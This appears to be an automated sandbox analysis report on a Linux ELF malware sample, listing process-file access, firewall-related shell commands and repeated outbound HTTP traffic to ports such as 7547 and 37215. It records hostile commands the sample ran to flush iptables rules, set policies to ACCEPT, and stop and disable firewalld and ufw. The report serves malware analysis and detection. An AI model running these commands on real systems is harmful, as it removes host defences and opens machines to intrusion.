Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1642/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/788/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/788/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/789/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/789/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1648/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2078/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2077/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2074/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2195/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/793/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/793/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1656/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1654/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/2226/fd	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6483)	File opened: /proc/1532/fd	Jump to behavior

Source: /tmp/4lXTg8P7Ih.elf (PID: 6227)	Shell command executed: sh -c "iptables -F >/dev/null 2>&1"	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6236)	Shell command executed: sh -c "iptables -X >/dev/null 2>&1"	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6239)	Shell command executed: sh -c "iptables -t nat -F >/dev/null 2>&1"	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6244)	Shell command executed: sh -c "iptables -t nat -X >/dev/null 2>&1"	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6247)	Shell command executed: sh -c "iptables -t mangle -F >/dev/null 2>&1"	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6251)	Shell command executed: sh -c "iptables -t mangle -X >/dev/null 2>&1"	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6254)	Shell command executed: sh -c "iptables -P INPUT ACCEPT >/dev/null 2>&1"	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6257)	Shell command executed: sh -c "iptables -P FORWARD ACCEPT >/dev/null 2>&1"	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6260)	Shell command executed: sh -c "service iptables save >/dev/null 2>&1"	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6267)	Shell command executed: sh -c "systemctl stop firewalld >/dev/null 2>&1"	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6270)	Shell command executed: sh -c "systemctl disable firewalld >/dev/null 2>&1"	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6273)	Shell command executed: sh -c "ufw disable >/dev/null 2>&1"	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6444)	Shell command executed: sh -c "systemctl disable ufw >/dev/null 2>&1"	Jump to behavior
Source: /tmp/4lXTg8P7Ih.elf (PID: 6472)	Shell command executed: sh -c "systemctl stop ufw >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 6231)	Iptables executable: /usr/sbin/iptables -> iptables -F	Jump to behavior
Source: /bin/sh (PID: 6238)	Iptables executable: /usr/sbin/iptables -> iptables -X	Jump to behavior
Source: /bin/sh (PID: 6241)	Iptables executable: /usr/sbin/iptables -> iptables -t nat -F	Jump to behavior
Source: /bin/sh (PID: 6246)	Iptables executable: /usr/sbin/iptables -> iptables -t nat -X	Jump to behavior
Source: /bin/sh (PID: 6249)	Iptables executable: /usr/sbin/iptables -> iptables -t mangle -F	Jump to behavior
Source: /bin/sh (PID: 6253)	Iptables executable: /usr/sbin/iptables -> iptables -t mangle -X	Jump to behavior
Source: /bin/sh (PID: 6256)	Iptables executable: /usr/sbin/iptables -> iptables -P INPUT ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6259)	Iptables executable: /usr/sbin/iptables -> iptables -P FORWARD ACCEPT	Jump to behavior
Source: /usr/sbin/ufw (PID: 6276)	Iptables executable: /usr/sbin/iptables -> /usr/sbin/iptables -V	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6281)	Iptables executable: /sbin/iptables -> iptables -F ufw-logging-deny	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6282)	Iptables executable: /sbin/iptables -> iptables -F ufw-logging-allow	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6283)	Iptables executable: /sbin/iptables -> iptables -F ufw-not-local	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6284)	Iptables executable: /sbin/iptables -> iptables -F ufw-user-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6285)	Iptables executable: /sbin/iptables -> iptables -F ufw-user-limit-accept	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6286)	Iptables executable: /sbin/iptables -> iptables -F ufw-user-limit	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6287)	Iptables executable: /sbin/iptables -> iptables -F ufw-skip-to-policy-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6288)	Iptables executable: /sbin/iptables -> iptables -F ufw-reject-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6289)	Iptables executable: /sbin/iptables -> iptables -F ufw-after-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6290)	Iptables executable: /sbin/iptables -> iptables -F ufw-after-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6291)	Iptables executable: /sbin/iptables -> iptables -F ufw-user-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6292)	Iptables executable: /sbin/iptables -> iptables -F ufw-before-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6293)	Iptables executable: /sbin/iptables -> iptables -F ufw-before-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6294)	Iptables executable: /sbin/iptables -> iptables -F ufw-skip-to-policy-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6295)	Iptables executable: /sbin/iptables -> iptables -F ufw-reject-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6296)	Iptables executable: /sbin/iptables -> iptables -F ufw-after-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6297)	Iptables executable: /sbin/iptables -> iptables -F ufw-after-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6298)	Iptables executable: /sbin/iptables -> iptables -F ufw-user-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6299)	Iptables executable: /sbin/iptables -> iptables -F ufw-user-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6300)	Iptables executable: /sbin/iptables -> iptables -F ufw-before-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6301)	Iptables executable: /sbin/iptables -> iptables -F ufw-before-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6302)	Iptables executable: /sbin/iptables -> iptables -F ufw-track-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6303)	Iptables executable: /sbin/iptables -> iptables -F ufw-track-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6304)	Iptables executable: /sbin/iptables -> iptables -F ufw-track-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6305)	Iptables executable: /sbin/iptables -> iptables -F ufw-skip-to-policy-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6306)	Iptables executable: /sbin/iptables -> iptables -F ufw-reject-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6307)	Iptables executable: /sbin/iptables -> iptables -F ufw-after-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6308)	Iptables executable: /sbin/iptables -> iptables -F ufw-after-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6309)	Iptables executable: /sbin/iptables -> iptables -F ufw-user-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6310)	Iptables executable: /sbin/iptables -> iptables -F ufw-user-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6311)	Iptables executable: /sbin/iptables -> iptables -F ufw-before-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6312)	Iptables executable: /sbin/iptables -> iptables -F ufw-before-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6313)	Iptables executable: /sbin/iptables -> iptables -Z ufw-logging-deny	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6314)	Iptables executable: /sbin/iptables -> iptables -Z ufw-logging-allow	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6315)	Iptables executable: /sbin/iptables -> iptables -Z ufw-not-local	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6316)	Iptables executable: /sbin/iptables -> iptables -Z ufw-user-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6317)	Iptables executable: /sbin/iptables -> iptables -Z ufw-user-limit-accept	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6318)	Iptables executable: /sbin/iptables -> iptables -Z ufw-user-limit	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6319)	Iptables executable: /sbin/iptables -> iptables -Z ufw-skip-to-policy-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6320)	Iptables executable: /sbin/iptables -> iptables -Z ufw-reject-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6321)	Iptables executable: /sbin/iptables -> iptables -Z ufw-after-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6322)	Iptables executable: /sbin/iptables -> iptables -Z ufw-after-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6323)	Iptables executable: /sbin/iptables -> iptables -Z ufw-user-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6324)	Iptables executable: /sbin/iptables -> iptables -Z ufw-before-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6325)	Iptables executable: /sbin/iptables -> iptables -Z ufw-before-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6326)	Iptables executable: /sbin/iptables -> iptables -Z ufw-skip-to-policy-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6327)	Iptables executable: /sbin/iptables -> iptables -Z ufw-reject-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6328)	Iptables executable: /sbin/iptables -> iptables -Z ufw-after-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6329)	Iptables executable: /sbin/iptables -> iptables -Z ufw-after-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6330)	Iptables executable: /sbin/iptables -> iptables -Z ufw-user-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6331)	Iptables executable: /sbin/iptables -> iptables -Z ufw-user-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6332)	Iptables executable: /sbin/iptables -> iptables -Z ufw-before-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6333)	Iptables executable: /sbin/iptables -> iptables -Z ufw-before-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6334)	Iptables executable: /sbin/iptables -> iptables -Z ufw-track-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6335)	Iptables executable: /sbin/iptables -> iptables -Z ufw-track-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6336)	Iptables executable: /sbin/iptables -> iptables -Z ufw-track-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6337)	Iptables executable: /sbin/iptables -> iptables -Z ufw-skip-to-policy-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6338)	Iptables executable: /sbin/iptables -> iptables -Z ufw-reject-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6339)	Iptables executable: /sbin/iptables -> iptables -Z ufw-after-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6340)	Iptables executable: /sbin/iptables -> iptables -Z ufw-after-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6341)	Iptables executable: /sbin/iptables -> iptables -Z ufw-user-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6342)	Iptables executable: /sbin/iptables -> iptables -Z ufw-user-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6343)	Iptables executable: /sbin/iptables -> iptables -Z ufw-before-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6344)	Iptables executable: /sbin/iptables -> iptables -Z ufw-before-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6345)	Iptables executable: /sbin/iptables -> iptables -X ufw-logging-deny	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6346)	Iptables executable: /sbin/iptables -> iptables -X ufw-logging-allow	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6347)	Iptables executable: /sbin/iptables -> iptables -X ufw-not-local	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6348)	Iptables executable: /sbin/iptables -> iptables -X ufw-user-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6349)	Iptables executable: /sbin/iptables -> iptables -X ufw-user-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6350)	Iptables executable: /sbin/iptables -> iptables -X ufw-user-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6351)	Iptables executable: /sbin/iptables -> iptables -X ufw-user-limit-accept	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6352)	Iptables executable: /sbin/iptables -> iptables -X ufw-user-limit	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6353)	Iptables executable: /sbin/iptables -> iptables -X ufw-user-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6354)	Iptables executable: /sbin/iptables -> iptables -X ufw-user-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6355)	Iptables executable: /sbin/iptables -> iptables -X ufw-user-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6356)	Iptables executable: /sbin/iptables -> iptables -X ufw-skip-to-policy-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6357)	Iptables executable: /sbin/iptables -> iptables -X ufw-skip-to-policy-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6358)	Iptables executable: /sbin/iptables -> iptables -X ufw-skip-to-policy-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6359)	Iptables executable: /sbin/iptables -> iptables -P INPUT ACCEPT	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6360)	Iptables executable: /sbin/iptables -> iptables -P OUTPUT ACCEPT	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6361)	Iptables executable: /sbin/iptables -> iptables -P FORWARD ACCEPT	Jump to behavior

Source: /usr/sbin/service (PID: 6266)	Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target	Jump to behavior
Source: /bin/sh (PID: 6269)	Systemctl executable: /usr/bin/systemctl -> systemctl stop firewalld	Jump to behavior
Source: /bin/sh (PID: 6272)	Systemctl executable: /usr/bin/systemctl -> systemctl disable firewalld	Jump to behavior
Source: /bin/sh (PID: 6446)	Systemctl executable: /usr/bin/systemctl -> systemctl disable ufw	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 6450)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 6465)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /bin/sh (PID: 6474)	Systemctl executable: /usr/bin/systemctl -> systemctl stop ufw	Jump to behavior

Source: submitted sample

Stderr: qemu: uncaught target signal 11 (Segmentation fault) - core dumped: exit code = 0

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 40446 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 39230 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 52460 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 8081 -> 40446
Source: unknown	Network traffic detected: HTTP traffic on port 39230 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 52460 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 52062 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 52138 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39488 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47874 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 52000 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58274 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48036 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 52086 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41680 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41220 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36606 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 54046 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 33704 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57358 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41820 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49390 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39230 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 47702 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41252 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41864 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 54080 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36712 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53918 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49504 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 47702
Source: unknown	Network traffic detected: HTTP traffic on port 55960 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 41868 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 33510 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53930 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57358 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48036 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 33522 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 33510
Source: unknown	Network traffic detected: HTTP traffic on port 55476 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 33522
Source: unknown	Network traffic detected: HTTP traffic on port 53010 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55704 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57464 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49352 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 47724 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34846 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49420 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49352
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 47724
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 34846
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49420
Source: unknown	Network traffic detected: HTTP traffic on port 34424 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 44832 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53246 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34850 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 34850
Source: unknown	Network traffic detected: HTTP traffic on port 45710 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45726 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58274 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57538 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58370 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45092 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57588 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58330 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39230 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 39488 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58342 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44484 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58354 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 44494 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 8081 -> 58354
Source: unknown	Network traffic detected: HTTP traffic on port 53010 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44494 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55960 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 58608 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45534 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 58608 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59512 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56140 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48880 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60680 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40948 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60724 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58670 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44132 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59548 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 44132
Source: unknown	Network traffic detected: HTTP traffic on port 44140 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56182 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48926 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 48880
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 44140
Source: unknown	Network traffic detected: HTTP traffic on port 46296 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 46756 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 48926
Source: unknown	Network traffic detected: HTTP traffic on port 46308 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 46772 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40948 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57822 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57828 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53562 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57700 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40410 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44832 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40948 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57700 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45534 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 39230 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 39488 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40410 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53010 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55960 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 40948 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40410 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53562 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57700 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53640 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40948 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40410 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45534 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 44832 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53640 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57700 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40410 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40948 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39488 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39230 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 53010 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55960 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 53640 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57700 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45534 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 44832 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40410 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40948 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53640 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57700 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53010 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39488 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39230 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 55960 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 45534 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 40410 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53640 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40948 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44832 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58602 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59468 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 59518
Source: unknown	Network traffic detected: HTTP traffic on port 47782 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58636 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 42040 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59468 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 47858 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 47782
Source: unknown	Network traffic detected: HTTP traffic on port 43940 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56690 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59394 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 59468
Source: unknown	Network traffic detected: HTTP traffic on port 43964 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 42124 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 47858
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 56690
Source: unknown	Network traffic detected: HTTP traffic on port 56728 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59436 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 56728
Source: unknown	Network traffic detected: HTTP traffic on port 36432 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49438 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36586 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36684 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36612 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44186 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34564 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36618 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49438 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44196 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34580 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36530 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36586 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36684 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34176 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 39198 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44490 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39226 -> 7547
